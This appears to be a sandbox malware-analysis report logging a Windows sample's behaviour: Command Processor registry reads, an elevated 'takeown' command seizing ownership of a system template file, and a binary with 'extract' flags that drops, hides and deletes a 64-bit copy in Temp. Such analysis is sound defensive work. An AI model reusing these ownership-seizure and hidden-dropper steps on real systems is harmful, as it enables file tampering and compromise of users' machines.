| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x93c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #132: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #132 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:51, Reason: Child Process |
| Unmonitor | End Time: 00:04:54, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5dc |
| Parent PID | 0x5c0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BD8
0x
E8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x048cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x048effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048d0000 | 0x048d0000 | 0x048dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x048e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x048f1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x048f0000 | 0x048f4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x04913fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004920000 | 0x04920000 | 0x0495ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049a0000 | 0x049a0000 | 0x049a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049b0000 | 0x049b0000 | 0x049b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x049d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04b70000 | 0x04b99fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04bb0000 | 0x04c6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c70000 | 0x04c70000 | 0x04d9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004da0000 | 0x04da0000 | 0x04f27fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f30000 | 0x04f30000 | 0x050b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050c0000 | 0x050c0000 | 0x064bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x064c0000 | 0x067f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f900000 | 0x7f900000 | 0x7f9fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fa00000 | 0x7fa00000 | 0x7fa22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa24000 | 0x7fa24000 | 0x7fa24fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa28000 | 0x7fa28000 | 0x7fa2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa2b000 | 0x7fa2b000 | 0x7fa2bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa2d000 | 0x7fa2d000 | 0x7fa2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #133: vidhs3md.exe
179
0
| Information | Value |
|---|---|
| ID | #133 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:52, Reason: Child Process |
| Unmonitor | End Time: 00:04:58, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd14 |
| Parent PID | 0xec4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9E4
0x
E90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00240000 | 0x002fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00847fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x01ddffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x743b0000 | 0x74441fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | os_pid = 0xc30, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
